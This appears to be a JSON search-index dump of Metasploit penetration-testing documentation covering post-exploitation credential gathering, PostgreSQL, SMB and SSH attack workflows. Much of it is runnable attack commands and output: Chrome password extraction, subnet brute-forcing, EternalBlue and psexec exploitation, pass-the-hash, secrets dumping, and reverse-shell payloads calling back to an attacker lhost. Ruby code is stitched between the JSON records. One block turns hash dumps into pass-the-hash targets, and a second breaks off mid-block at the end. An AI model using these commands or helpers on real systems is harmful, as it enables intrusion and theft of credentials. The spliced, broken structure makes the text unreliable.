    "content": "Metasploit’s post gather modules are useful after a Metasploit session has opened. This guide focuses on Post modules for gathering additional information from a host after a Metasploit session has opened. Metasploit post modules replace old Meterpreter scripts, which are no longer maintained or accepted by the framework team. You can search for post gather modules within msfconsole: . msf6 &amp;gt; search type:post platform:windows name:gather Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 post/windows/gather/ad_to_sqlite normal No AD Computer, Group and Recursive User Membership to Local SQLite DB 1 post/windows/gather/credentials/aim normal No Aim credential gatherer ... etc .. Usage . There are two ways to launch a Post module, both of which require an existing session. Within an msf prompt you can use the use command followed by the run command to execute the module against the required session. For instance, to extract credentials from Chrome on the most recently opened Metasploit session: . msf6 &amp;gt; use post/windows/gather/enum_chrome msf6 post(windows/gather/enum_chrome) &amp;gt; run session=-1 verbose=true [*] Impersonating token: 7192 [*] Running as user 'DESKTOP-N3MAG5R\\basic_user'... [*] Extracting data for user 'basic_user'... 
[+] Downloaded Web Data to '/Users/user/.msf4/loot/20220422122125_default_192.168.123.151_chrome.raw.WebD_560928.txt' [-] Cookies not found [+] Downloaded History to '/Users/user/.msf4/loot/20220422122126_default_192.168.123.151_chrome.raw.Histo_861946.txt' [+] Downloaded Login Data to '/Users/user/.msf4/loot/20220422122126_default_192.168.123.151_chrome.raw.Login_785667.txt' [+] Downloaded Bookmarks to '/Users/user/.msf4/loot/20220422122127_default_192.168.123.151_chrome.raw.Bookm_612993.txt' [+] Downloaded Preferences to '/Users/user/.msf4/loot/20220422122127_default_192.168.123.151_chrome.raw.Prefe_893631.txt' [*] Found password encrypted with masterkey [+] Found masterkey! [+] Decrypted data: url:http://192.168.123.6/ helloworld:157746edfe6b4d369d7e656c00eeb5c8 [+] Decrypted data: url:https://www.example.com/ my_username:my_password_123 [+] Decrypted data saved in: /Users/user/.msf4/loot/20220422122129_default_192.168.123.151_chrome.decrypted_981698.txt [*] Post module execution completed msf6 post(windows/gather/enum_chrome) &amp;gt; . Or within a Meterpreter prompt use the run command, which will automatically set the module’s session value: . msf6 &amp;gt; sessions --interact -1 [*] Starting interaction with 5... meterpreter &amp;gt; run post/windows/gather/enum_applications [*] Enumerating applications installed on DESKTOP-N3MAG5R Installed Applications ====================== Name Version ---- ------- 7-Zip 21.07 (x64) 21.07 Application Verifier x64 External Package 10.1.19041.685 ClickOnce Bootstrapper Package for Microsoft .NET Framework 4.8.04162 DiagnosticsHub_CollectionService 16.1.28901 Docker Desktop 2.2.0.4 ... etc .. ",
    "url": "/docs/pentesting/metasploit-guide-post-gather-modules.html#post-modules",
    "relUrl": "/docs/pentesting/metasploit-guide-post-gather-modules.html#post-modules"
  },"577": {
    "doc": "Post Gather Modules",
    "title": "Useful modules",
    "content": "Windows GPP Credentials . This module enumerates the victim machine’s domain controller and connects to it via SMB. It then looks for Group Policy Preference XML files containing local user accounts and passwords and decrypts them using Microsoft’s public AES key. Cached Group Policy files may be found on end-user devices if the group policy object is deleted rather than unlinked . use post/windows/gather/credentials/gpp run session=-1 . ",
    "url": "/docs/pentesting/metasploit-guide-post-gather-modules.html#useful-modules",
    "relUrl": "/docs/pentesting/metasploit-guide-post-gather-modules.html#useful-modules"
  },"578": {
    "doc": "Post Gather Modules",
    "title": "Post Gather Modules",
    "content": " ",
    "url": "/docs/pentesting/metasploit-guide-post-gather-modules.html",
    "relUrl": "/docs/pentesting/metasploit-guide-post-gather-modules.html"
  },"579": {
    "doc": "PostgreSQL",
    "title": "PostgreSQL Workflows",
    "content": "PostgreSQL, sometimes aliased as Postgres, is frequently found on port 5432/TCP. It is an open-source relational database management system. Metasploit has support for multiple PostgreSQL modules, including: . | Version enumeration | Verifying/bruteforcing credentials | Dumping database information | Capture server | Executing arbitrary SQL queries against the database | Gaining reverse shells | . There are more modules than listed here; for the full list of modules run the search command within msfconsole: . msf6 &amp;gt; search postgres . Or to search for modules that work with a specific session type: . msf6 &amp;gt; search session_type:postgres . Lab Environment . When testing in a lab environment PostgreSQL can either be installed on the host machine or within Docker: . docker run -it --rm --publish 127.0.0.1:5432:5432 -e POSTGRES_PASSWORD=password postgres:13.1-alpine . PostgreSQL Enumeration . Enumerate version: . use auxiliary/scanner/postgres/postgres_version run postgres://192.168.123.13 run postgres://postgres:[email protected] . PostgreSQL Login / Bruteforce . If you have PostgreSQL credentials to validate: . use auxiliary/scanner/postgres/postgres_login run 'postgres://root: a b c [email protected]' . Re-using PostgreSQL credentials in a subnet: . use auxiliary/scanner/postgres/postgres_login run cidr:/24:postgres://user:[email protected] threads=50 . Using an alternative port: . use auxiliary/scanner/postgres/postgres_login run postgres://user:[email protected]:2222 . Brute-force host with known user and password list: . use auxiliary/scanner/postgres/postgres_login run postgres://[email protected] threads=50 pass_file=./wordlist.txt . Brute-force credentials: . use auxiliary/scanner/postgres/postgres_login run postgres://192.168.222.1 threads=50 user_file=./users.txt pass_file=./wordlist.txt . Brute-force credentials in a subnet: . 
use auxiliary/scanner/postgres/postgres_login run cidr:/24:postgres://user:[email protected] threads=50 run cidr:/24:postgres://[email protected] threads=50 pass_file=./wordlist.txt . Obtaining an Interactive Session . The CreateSession option for auxiliary/scanner/postgres/postgres_login allows you to obtain an interactive session for the Postgres client you’re connecting to. The run command with CreateSession set to true should give you an interactive session. For example: . msf6 auxiliary(scanner/postgres/postgres_login) &amp;gt; run rhost=127.0.0.1 rport=5432 username=postgres password=password database=template1 createsession=true . Should yield: . [+] 127.0.0.1:5432 - Login Successful: postgres:password@template1 [*] PostgreSQL session 1 opened (127.0.0.1:61324 -&amp;gt; 127.0.0.1:5432) at 2024-03-15 14:00:12 -0500 [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed . You can interact with your session using sessions -i -1 or sessions &amp;lt;session id&amp;gt;. Use the help command for more info. msf6 auxiliary(scanner/postgres/postgres_login) &amp;gt; sessions Active sessions =============== Id Name Type Information Connection -- ---- ---- ----------- ---------- 1 postgresql PostgreSQL postgres @ 127.0.0.1:5432 127.0.0.1:61324 -&amp;gt; 127.0.0.1:5432 (127.0.0.1) msf6 auxiliary(scanner/postgres/postgres_login) &amp;gt; sessions -i 1 [*] Starting interaction with 1... When interacting with a session, the help command can be useful: . postgresql @ 127.0.0.1:5432 (template1) &amp;gt; help Core Commands ============= Command Description ------- ----------- ? 
Help menu background Backgrounds the current session bg Alias for background exit Terminate the PostgreSQL session help Help menu irb Open an interactive Ruby shell on the current session pry Open the Pry debugger on the current session sessions Quickly switch to another session PostgreSQL Client Commands ========================== Command Description ------- ----------- query Run a single SQL query query_interactive Enter an interactive prompt for running multiple SQL queries Local File System Commands ========================== Command Description ------- ----------- getlwd Print local working directory (alias for lpwd) lcat Read the contents of a local file to the screen lcd Change local working directory ldir List local files (alias for lls) lls List local files lmkdir Create new directory on local machine lpwd Print local working directory This session also works with the following modules: auxiliary/admin/postgres/postgres_readfile auxiliary/admin/postgres/postgres_sql auxiliary/scanner/postgres/postgres_hashdump auxiliary/scanner/postgres/postgres_schemadump auxiliary/scanner/postgres/postgres_version exploit/linux/postgres/postgres_payload exploit/multi/postgres/postgres_copy_from_program_cmd_exec exploit/multi/postgres/postgres_createlang exploit/windows/postgres/postgres_payload . Once you’ve done that, you can run any Postgres query against the target using the query command: . postgresql @ 127.0.0.1:5432 (template1) &amp;gt; query -h Usage: query Run a single SQL query on the target. OPTIONS: -h, --help Help menu. -i, --interact Enter an interactive prompt for running multiple SQL queries Examples: query SELECT user; query SELECT version(); query SELECT * FROM pg_catalog.pg_tables; postgresql @ 127.0.0.1:5432 (template1) &amp;gt; query 'SELECT version();' [*] SELECT 1 Response ======== # version - ------- 0 PostgreSQL 14.1 on aarch64-apple-darwin20.6.0, compiled by Apple clang version 12.0.5 (clang-1205.0.22.9), 64-bit . 
Alternatively you can enter a SQL prompt via the query_interactive command which supports multiline commands: . postgresql @ 127.0.0.1:5432 (template1) &amp;gt; query_interactive -h Usage: query_interactive Go into an interactive SQL shell where SQL queries can be executed. To exit, type 'exit', 'quit', 'end' or 'stop'. postgresql @ 127.0.0.1:5432 (template1) &amp;gt; query_interactive [*] Starting interactive SQL shell for postgresql @ 127.0.0.1:5432 (template1) [*] SQL commands ending with ; will be executed on the remote server. Use the exit command to exit. SQL &amp;gt;&amp;gt; SELECT table_name SQL *&amp;gt; FROM information_schema.tables SQL *&amp;gt; LIMIT 2; [*] Executing query: SELECT table_name FROM information_schema.tables LIMIT 2; [*] SELECT 2 Response ======== # table_name - ---------- 0 pg_statistic 1 pg_type SQL &amp;gt;&amp;gt; . PostgreSQL Capture Server . Captures and logs PostgreSQL credentials: . use auxiliary/server/capture/postgresql run . For example, if a client connects with: . psql postgres://postgres:mysecretpassword@localhost:5432 . Metasploit’s output will be: . msf6 auxiliary(server/capture/postgresql) &amp;gt; [*] Started service listener on 0.0.0.0:5432 [*] Server started. [+] PostgreSQL LOGIN 127.0.0.1:60406 postgres / mysecretpassword / postgres . PostgreSQL Dumping . User and hash dump: . use auxiliary/scanner/postgres/postgres_hashdump run postgres://postgres:[email protected] run postgres://postgres:[email protected]/database_name . Schema dump: . use auxiliary/scanner/postgres/postgres_schemadump run postgres://postgres:[email protected] run postgres://postgres:[email protected] ignored_databases=template1,template0,postgres . PostgreSQL Querying . use auxiliary/admin/postgres/postgres_sql run 'postgres://user:this is my [email protected]/database_name' sql='select version()' . PostgreSQL Reverse Shell . 
use exploit/linux/postgres/postgres_payload run postgres://postgres:[email protected] lhost=192.168.123.1 lport=5000 payload=linux/x64/meterpreter/reverse_tcp target='Linux\\ x86_64' . ",
    "url": "/docs/pentesting/metasploit-guide-postgresql.html#postgresql-workflows",
    "relUrl": "/docs/pentesting/metasploit-guide-postgresql.html#postgresql-workflows"
  },"580": {
    "doc": "PostgreSQL",
    "title": "PostgreSQL",
    "content": " ",
    "url": "/docs/pentesting/metasploit-guide-postgresql.html",
    "relUrl": "/docs/pentesting/metasploit-guide-postgresql.html"
  },"581": {
    "doc": "Setting Module Options",
    "title": "Module options",
    "content": "Each Metasploit module has a set of options which must be set before running. These can be seen with the show options or options command: . msf6 exploit(windows/smb/ms17_010_eternalblue) &amp;gt; options Module options (exploit/windows/smb/ms17_010_eternalblue): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html RPORT 445 yes The target port (TCP) SMBDomain no (Optional) The Windows domain to use for authentication. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines. SMBPass no (Optional) The password for the specified username SMBUser no (Optional) The username to authenticate as ... etc ... Payload options (windows/x64/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 192.168.1.239 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Automatic Target . Each Metasploit module also has advanced options, which can often be useful for fine-tuning modules; in particular, setting connection timeout values can be useful: . msf6 exploit(windows/smb/ms17_010_eternalblue) &amp;gt; advanced Module advanced options (exploit/windows/smb/ms17_010_eternalblue): Name Current Setting Required Description ---- --------------- -------- ----------- CHOST no The local client address CPORT no The local client port CheckModule auxiliary/scanner/smb/smb_ms17_010 yes Module to check with ConnectTimeout 10 yes Maximum number of seconds to establish a TCP connection ... etc ... 
Payload advanced options (windows/x64/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- AutoLoadStdapi true yes Automatically load the Stdapi extension AutoRunScript no A script to run automatically on session creation. AutoSystemInfo true yes Automatically capture system information on ... etc ... You can see which options still need to be set with the show missing command: . msf6 exploit(windows/smb/ms17_010_eternalblue) &amp;gt; show missing Module options (exploit/windows/smb/ms17_010_eternalblue): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html . Setting options . Traditional usage of Metasploit involves loading a module, and setting multiple options individually: . use exploit/linux/postgres/postgres_payload set username administrator set password pass set rhost 192.168.123.6 set rport 5432 set database postgres set lhost 192.168.123.1 set lport 5000 run . You can also specify multiple RHOSTS separated by spaces or with a CIDR subnet mask: . set rhosts 127.0.0.1 127.0.0.2 set rhosts 127.0.0.1/24 . In 2021 support for running a module and specifying module options at the same time was added, dubbed inline option support. This workflow not only makes it easier to use reverse-i-search with CTRL+R in Metasploit’s console, but also makes it easier to share cheat sheets amongst pentesters. Example: . use exploit/linux/postgres/postgres_payload run postgres://postgres:[email protected] lhost=192.168.123.1 lport=5000 payload=linux/x64/meterpreter/reverse_tcp target='Linux\\ x86_64' verbose=true . You can set complex options using quotes. Example: . set COMMAND \"date --date='TZ=\\\"America/Los_Angeles\\\" 09:00 next Fri' --iso-8601=ns\" . URI support for RHOSTS . 
Metasploit also supports the use of URI strings as arguments, which allows setting multiple options at once - i.e. username, password, rport, rhost, etc.: . use exploit/linux/postgres/postgres_payload run postgres://administrator:[email protected] lhost=192.168.123.1 lport=5000 . The following protocols are currently supported, and described in more detail below: . | cidr - Can be combined with other protocols to specify address subnet mask length | file - Load a series of RHOST values separated by newlines from a file. This file can also include URI strings | http | https | mysql | postgres | smb | ssh | . To preserve whitespace, regardless of the protocol, use quotes: . use auxiliary/admin/postgres/postgres_sql run 'postgres://user:this is my [email protected]/database_name' sql='select version()' . In some scenarios it may be too troublesome to escape quotes within a password. In this scenario it is still possible to set the password option manually and use the URI argument without a password specified; the module will gracefully fall back to using the manually set password: . set password !@£$%^&amp;amp;*()\"' run smb://[email protected] . You can also specify multiple RHOST arguments, as well as provide additional inline options: . use scanner/smb/smb_enumshares run smb://test:[email protected] smb://user:[email protected] smb://test:[email protected] verbose=true . ",
    "url": "/docs/pentesting/metasploit-guide-setting-module-options.html#module-options",
    "relUrl": "/docs/pentesting/metasploit-guide-setting-module-options.html#module-options"
  },"582": {
    "doc": "Setting Module Options",
    "title": "Setting Module Options",
    "content": " ",
    "url": "/docs/pentesting/metasploit-guide-setting-module-options.html",
    "relUrl": "/docs/pentesting/metasploit-guide-setting-module-options.html"
  },"583": {
    "doc": "SMB",
    "title": "SMB Workflows",
    "content": "SMB (Server Message Block) is a protocol for sharing files across nodes on a network. There are two main ports for SMB: . | 139/TCP - Initially Microsoft implemented SMB on top of their existing NetBIOS network architecture, which allowed Windows computers on the same network to communicate | 445/TCP - Newer versions of SMB use this port, where NetBIOS is not used. | . Other terminology to be aware of: . | SMB - Server Message Block | CIFS - Common Internet File System | Samba - A free software re-implementation of SMB, which is frequently found on unix-like systems | . Metasploit has support for multiple SMB modules, including: . | Version enumeration | Verifying/bruteforcing credentials | Capture modules | Relay modules | File transfer | Exploit modules | . There are more modules than listed here, for the full list of modules run the search command within msfconsole: . msf6 &amp;gt; search smb . Or to search for modules that work with a specific session type: . msf6 &amp;gt; search session_type:smb . Lab Environment . When testing in a lab environment, SMB can be served from a Windows host machine, or from within Docker. For instance, running Samba on Ubuntu 16.04 (the commands after docker run are entered inside the container): . docker run -it --rm --publish 127.0.0.1:139:139 --publish 127.0.0.1:445:445 ubuntu:16.04 /bin/bash mkdir -p /tmp/foo apt update apt install -y samba . Verifying the version is as expected: . $ samba --version Version 4.3.11-Ubuntu . Configuring the share: . cat &amp;lt;&amp;lt; EOF &amp;gt;&amp;gt; /etc/samba/smb.conf [foo_share] comment = Foo samba share path = /tmp/foo read only = no browsable = yes EOF . Restart the service: . service smbd restart . SMB Login and Interactive Sessions . When using the smb_login module, the CreateSession option can be used to obtain an interactive session with the SMB server. Running with the following options: . 
msf6 auxiliary(scanner/smb/smb_login) &amp;gt; run CreateSession=true RHOSTS=172.14.2.164 RPORT=445 SMBDomain=windomain.local SMBPass=password SMBUser=username . Should give you output similar to . [*] 172.14.2.164:445 - 172.14.2.164:445 - Starting SMB login bruteforce [+] 172.14.2.164:445 - 172.14.2.164:445 - Success: 'windomain.local\\username:password' Administrator [*] SMB session 1 opened (172.16.158.1:62793 -&amp;gt; 172.14.2.164:445) at 2024-03-12 17:03:09 +0000 [*] 172.14.2.164:445 - Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed msf6 auxiliary(scanner/smb/smb_login) &amp;gt; sessions -i -1 [*] Starting interaction with 1... Which you can interact with using sessions -i &amp;lt;session id&amp;gt; or sessions -i -1 to interact with the most recently opened session. msf6 auxiliary(scanner/smb/smb_login) &amp;gt; sessions -i -1 [*] Starting interaction with 1... SMB (172.14.2.164) &amp;gt; shares Shares ====== # Name Type comment - ---- ---- ------- 0 ADMIN$ DISK|SPECIAL Remote Admin 1 C$ DISK|SPECIAL Default share 2 foo DISK 3 IPC$ IPC|SPECIAL Remote IPC SMB (172.14.2.164) &amp;gt; shares -i foo [+] Successfully connected to foo SMB (172.14.2.164\\foo) &amp;gt; ls ls === [truncated] . When interacting with a session, the help command can be useful: . SMB (172.14.2.164\\foo) &amp;gt; help Core Commands ============= Command Description ------- ----------- ? 
Help menu background Backgrounds the current session bg Alias for background exit Terminate the SMB session help Help menu irb Open an interactive Ruby shell on the current session pry Open the Pry debugger on the current session sessions Quickly switch to another session Shares Commands =============== Command Description ------- ----------- cat Read the file at the given path cd Change the current remote working directory delete Delete a file dir List all files in the current directory (alias for ls) download Download a file ls List all files in the current directory mkdir Make a new directory pwd Print the current remote working directory rmdir Delete a directory shares View the available shares and interact with one upload Upload a file Local File System Commands ========================== Command Description ------- ----------- getlwd Print local working directory (alias for lpwd) lcat Read the contents of a local file to the screen lcd Change local working directory ldir List local files (alias for lls) lls List local files lmkdir Create new directory on local machine lpwd Print local working directory This session also works with the following modules: auxiliary/admin/dcerpc/icpr_cert auxiliary/admin/dcerpc/samr_computer auxiliary/admin/smb/delete_file auxiliary/admin/smb/download_file auxiliary/admin/smb/psexec_ntdsgrab auxiliary/admin/smb/upload_file auxiliary/gather/windows_secrets_dump auxiliary/scanner/smb/pipe_auditor auxiliary/scanner/smb/pipe_dcerpc_auditor auxiliary/scanner/smb/smb_enum_gpp auxiliary/scanner/smb/smb_enumshares auxiliary/scanner/smb/smb_enumusers auxiliary/scanner/smb/smb_enumusers_domain auxiliary/scanner/smb/smb_lookupsid exploit/windows/smb/psexec . SMB Enumeration . Enumerate SMB version: . use auxiliary/scanner/smb/smb_version run smb://10.10.10.161 . Enumerate shares: . 
use auxiliary/scanner/smb/smb_enumshares run smb://10.10.10.161 run smb://user:[email protected] run 'smb://domain;user with spaces:[email protected]' SMB::AlwaysEncrypt=false SMB::ProtocolVersion=1 . Enumerate shares and show all files recursively: . use auxiliary/scanner/smb/smb_enumshares run 'smb://user:pass with a [email protected]' showfiles=true spidershares=true . Enumerate users: . use auxiliary/scanner/smb/smb_enumusers run smb://user:[email protected] . Enumerate Group Policy Preferences (GPP) files in an SMB share: . use auxiliary/scanner/smb/smb_enum_gpp run smb://192.168.123.13/share_name verbose=true store=true run smb://user:[email protected]/share_name verbose=true store=true . SMB Server . Create a mock SMB server that captures the NTLM authentication attempts it receives before returning NT_STATUS_LOGON_FAILURE. The captured challenge/response hashes can then be cracked offline: . use auxiliary/server/capture/smb run . SMB MS17-010 . Metasploit has a module for MS17-010, dubbed EternalBlue, which can target Windows 7, Windows 8.1, Windows 2012 R2, and Windows 10. Checking for exploitability: . use auxiliary/scanner/smb/smb_ms17_010 check 10.10.10.23 check 10.10.10.0/24 check smb://user:[email protected]/ check smb://domain;user:[email protected]/ check cidr:/24:smb://user:[email protected] threads=32 . As of 2021, Metasploit ships a single exploit module for MS17-010 that can target Windows 7, Windows 8.1, Windows 2012 R2, and Windows 10; full details are in the Metasploit Wrapup: . use exploit/windows/smb/ms17_010_eternalblue run 10.10.10.23 lhost=192.168.123.1 run 10.10.10.0/24 lhost=192.168.123.1 lport=5000 run smb://user:[email protected]/ lhost=192.168.123.1 run smb://domain;user:[email protected]/ lhost=192.168.123.1 . SMB psexec . Running psexec against a remote host with credentials: . use exploit/windows/smb/psexec run smb://user:[email protected] lhost=192.168.123.1 lport=5000 . Running psexec with NTLM hashes (pass-the-hash): . 
use exploit/windows/smb/psexec run smb://Administrator:aad3b435b51404eeaad3b435b51404ee:[email protected] lhost=10.10.14.13 lport=5000 . SMB Dumping . Dumping secrets with credentials: . use auxiliary/gather/windows_secrets_dump run smb://user:[email protected] . Dumping secrets with NTLM hashes: . use auxiliary/gather/windows_secrets_dump run smb://Administrator:aad3b435b51404eeaad3b435b51404ee:[email protected] . SMB Files . Download a file: . use auxiliary/admin/smb/download_file run smb://a:[email protected]/my_share/helloworld.txt . Upload a file: . use auxiliary/admin/smb/upload_file echo \"my file\" &amp;gt; local_file.txt run smb://a:[email protected]/my_share/remote_file.txt lpath=./local_file.txt . Kerberos Authentication . Details on the Kerberos specific option names are documented in Kerberos Service Authentication . Running psexec against a host: . msf6 &amp;gt; use exploit/windows/smb/psexec msf6 exploit(windows/smb/psexec) &amp;gt; run rhost=192.168.123.13 username=Administrator password=p4$$w0rd smb::auth=kerberos domaincontrollerrhost=192.168.123.13 smb::rhostname=dc3.demo.local domain=demo.local [*] Started reverse TCP handler on 192.168.123.1:4444 [*] 192.168.123.13:445 - Connecting to the server... [*] 192.168.123.13:445 - Authenticating to 192.168.123.13:445|demo.local as user 'Administrator'... 
[+] 192.168.123.13:445 - 192.168.123.13:88 - Received a valid TGT-Response [*] 192.168.123.13:445 - 192.168.123.13:445 - TGT MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230118120911_default_192.168.123.13_mit.kerberos.cca_474531.bin [+] 192.168.123.13:445 - 192.168.123.13:88 - Received a valid TGS-Response [*] 192.168.123.13:445 - 192.168.123.13:445 - TGS MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230118120911_default_192.168.123.13_mit.kerberos.cca_169149.bin [+] 192.168.123.13:445 - 192.168.123.13:88 - Received a valid delegation TGS-Response [*] 192.168.123.13:445 - Selecting PowerShell target [*] 192.168.123.13:445 - Executing the payload... [+] 192.168.123.13:445 - Service start timed out, OK if running a command or non-service executable... [*] Sending stage (175686 bytes) to 192.168.123.13 [*] Meterpreter session 6 opened (192.168.123.1:4444 -&amp;gt; 192.168.123.13:49738) at 2023-01-18 12:09:13 +0000 meterpreter &amp;gt; . ",
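The pass-the-hash form used with psexec and windows_secrets_dump above, as an added example that is not Metasploit's code: a Ruby helper that turns hashdump-style dump output (user:rid:LM:NT:::) into the smb://user:LM:NT@host URIs the page feeds to psexec, skipping lines that are not records and accounts whose NT hash is the empty-password hash. SAMPLE_DUMP is constructed; the NT hash on its Administrator line is that of the string 'password'. Assumptions: the dump is in the hashdump format shown, and the target host and domain are supplied by the caller.

```ruby
# Added example, not Metasploit's code: hashdump-style secrets dump output
# to the smb://user:LM:NT@host pass-the-hash URIs used with psexec.
EMPTY_LM = 'aad3b435b51404eeaad3b435b51404ee'.freeze # LM hash of the empty password
EMPTY_NT = '31d6cfe0d16ae931b73c59d7e0c089c0'.freeze # NT hash of the empty password
HEX32 = /\A\h{32}\z/

# Constructed sample in the user:rid:LM:NT::: format windows_secrets_dump
# prints; the Administrator NT hash is that of the string 'password'.
SAMPLE_DUMP = <<~DUMP
  [*] Dumping SAM hashes
  Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
  Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
  svc_backup:1105:aad3b435b51404eeaad3b435b51404ee:not-a-hash:::
DUMP

Secret = Struct.new(:user, :rid, :lm, :nt) do
  def empty_password?
    nt == EMPTY_NT
  end

  # A real LM hash means LM storage is still enabled on the target: worth reporting.
  def lm_present?
    lm != EMPTY_LM
  end

  # The LM half is carried even when it is the empty-LM constant, exactly as
  # the psexec example above does.
  def pth_uri(host, domain: nil)
    principal = domain ? "#{domain};#{user}" : user
    "smb://#{principal}:#{lm}:#{nt}@#{host}"
  end
end

# One dump line to a Secret, or nil for banners, history entries and lines
# whose hashes are not 32 hex digits.
def parse_hashdump_line(line)
  fields = line.strip.split(':')
  return nil unless fields.size >= 4
  user, rid, lm, nt = fields[0, 4]
  return nil unless rid.match?(/\A\d+\z/) && lm.match?(HEX32) && nt.match?(HEX32)
  Secret.new(user, Integer(rid), lm.downcase, nt.downcase)
end

# [user, uri] pairs for every usable account. Empty-password accounts are
# skipped: the hash authenticates nowhere useful and typically belongs to a
# disabled built-in such as Guest.
def pth_targets(dump_text, host, domain: nil)
  dump_text.each_line.map { |l| parse_hashdump_line(l) }.compact
           .reject(&:empty_password?)
           .map { |s| [s.user, s.pth_uri(host, domain: domain)] }
end

# Usage: URIs ready for `run <uri> lhost=...` with exploit/windows/smb/psexec.
pth_targets(SAMPLE_DUMP, '10.10.10.161')
```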
    "url": "/docs/pentesting/metasploit-guide-smb.html#smb-workflows",
    "relUrl": "/docs/pentesting/metasploit-guide-smb.html#smb-workflows"
  },"584": {
    "doc": "SMB",
    "title": "SMB",
    "content": " ",
    "url": "/docs/pentesting/metasploit-guide-smb.html",
    "relUrl": "/docs/pentesting/metasploit-guide-smb.html"
  },"585": {
    "doc": "SSH",
    "title": "SSH Workflows",
    "content": "SSH, also known as Secure Shell, is frequently found on port 22/TCP. The protocol lets SSH clients connect securely to an SSH server and execute commands on it; it also supports tunneling network traffic, which Metasploit can leverage for pivoting. Metasploit has support for multiple SSH modules, including: . | Version enumeration | Verifying/bruteforcing credentials | Opening sessions | Pivoting support | . There are more modules than listed here, for the full list of modules run the search command within msfconsole: . msf6 &amp;gt; search ssh . Lab Environment . There are multiple SSH servers to choose from and install on a host machine, including: . | OpenSSH - OpenBSD Secure Shell, most popular | Dropbear | . It is also possible to use Docker. First create a new Dockerfile (it deliberately enables password authentication, a weak root password and the legacy diffie-hellman-group1-sha1 key exchange, so keep it bound to localhost as below): . FROM alpine:latest RUN apk add --update RUN apk --no-cache add openssh RUN ssh-keygen -A RUN echo 'root:toor' | chpasswd RUN echo $' AuthorizedKeysFile .ssh/authorized_keys\\n\\ GatewayPorts no \\n\\ X11Forwarding no \\n\\ Subsystem sftp /usr/lib/ssh/sftp-server \\n\\ PasswordAuthentication yes \\n\\ AllowTcpForwarding yes' &amp;gt; /etc/ssh/sshd_config RUN echo \"KexAlgorithms diffie-hellman-group1-sha1\" &amp;gt;&amp;gt; /etc/ssh/sshd_config RUN addgroup -g 700 test_user \\ &amp;amp;&amp;amp; adduser -G test_user -D -u 700 -S -h /home/test_user -s /bin/sh test_user RUN echo -n 'test_user:password123' | chpasswd EXPOSE 22 CMD [\"/usr/sbin/sshd\",\"-D\"] . Build and run: . docker build --tag ssh_lab:latest - &amp;lt; Dockerfile docker run --rm -it --publish 127.0.0.1:2222:22 ssh_lab:latest . It should now be possible to test the SSH login from msfconsole: . 
msf6 &amp;gt; use scanner/ssh/ssh_login msf6 auxiliary(scanner/ssh/ssh_login) &amp;gt; run ssh://test_user:[email protected]:2222 [*] 127.0.0.1:2222 - Starting bruteforce [+] 127.0.0.1:2222 - Success: 'test_user:password123' 'uid=700(test_user) gid=700(test_user) groups=700(test_user),700(test_user) Linux 5a26fe63abef 5.10.25-linuxkit #1 SMP Tue Mar 23 09:27:39 UTC 2021 x86_64 Linux ' [*] SSH session 1 opened (127.0.0.1:57318 -&amp;gt; 127.0.0.1:2222 ) at 2022-04-23 01:25:01 +0100 [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed . Note that TCP forwarding requires the AllowTcpForwarding option to be enabled in the server’s configuration file, which is often the default. If the option is disabled or the more specific PermitOpen option does not allow the connection to be made, the connection will fail with the administratively prohibited error. SSH Enumeration . Enumerate SSH version: . use auxiliary/scanner/ssh/ssh_version run ssh://127.0.0.1 . SSH Bruteforce . Brute-force host with known user and password list: . use scanner/ssh/ssh_login run ssh://[email protected] threads=50 pass_file=./wordlist.txt . Brute-force credentials: . use scanner/ssh/ssh_login run ssh://192.168.222.1 threads=50 user_file=./users.txt pass_file=./wordlist.txt . Brute-force credentials in a subnet: . use scanner/ssh/ssh_login run cidr:/24:ssh://user:[email protected] threads=50 run cidr:/24:ssh://[email protected] threads=50 pass_file=./wordlist.txt . SSH Login Session . If you have valid SSH credentials the ssh_login module will open a Metasploit session for you: . use scanner/ssh/ssh_login run ssh://user:[email protected] . Re-using SSH credentials in a subnet: . use scanner/ssh/ssh_login run cidr:/24:ssh://user:[email protected] threads=50 . Using an alternative port: . use scanner/ssh/ssh_login run ssh://user:[email protected]:2222 . SSH Pivoting . 
It is only possible to perform SSH pivoting if the remote target has the AllowTcpForwarding option enabled in the server’s configuration file, which is often the default. If the option is disabled, or the more specific PermitOpen option does not allow the connection to be made, the connection will fail with the administratively prohibited error. Like Meterpreter, it is possible to port forward through a Metasploit SSH session by adding a route for it: . route add 172.18.103.0/24 ssh_session_id . To add a route for the most recently opened session: . route add 172.18.103.0/24 -1 . ",
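The AllowTcpForwarding and PermitOpen caveat above, as an added example that is neither OpenSSH's nor Metasploit's code: a Ruby evaluator that reads an sshd_config and answers whether a direct-tcpip (local) forward, which routing through an SSH session relies on, would be permitted for a given user or refused with administratively prohibited. LAB_SSHD_CONFIG repeats the settings from the lab Dockerfile above; HARDENED_SSHD_CONFIG is a constructed locked-down variant. Assumptions: only Match all and Match User blocks are evaluated (blocks with other criteria are ignored), PermitOpen entries within one scope accumulate, and host patterns are literal or '*'.

```ruby
# Added example, not OpenSSH's or Metasploit's code: would sshd permit a
# direct-tcpip forward for this user? Assumptions are noted inline.

# Lab config copied from the Dockerfile above (the lines as written there).
LAB_SSHD_CONFIG = <<~CONF
  AuthorizedKeysFile .ssh/authorized_keys
  GatewayPorts no
  X11Forwarding no
  Subsystem sftp /usr/lib/ssh/sftp-server
  PasswordAuthentication yes
  AllowTcpForwarding yes
CONF

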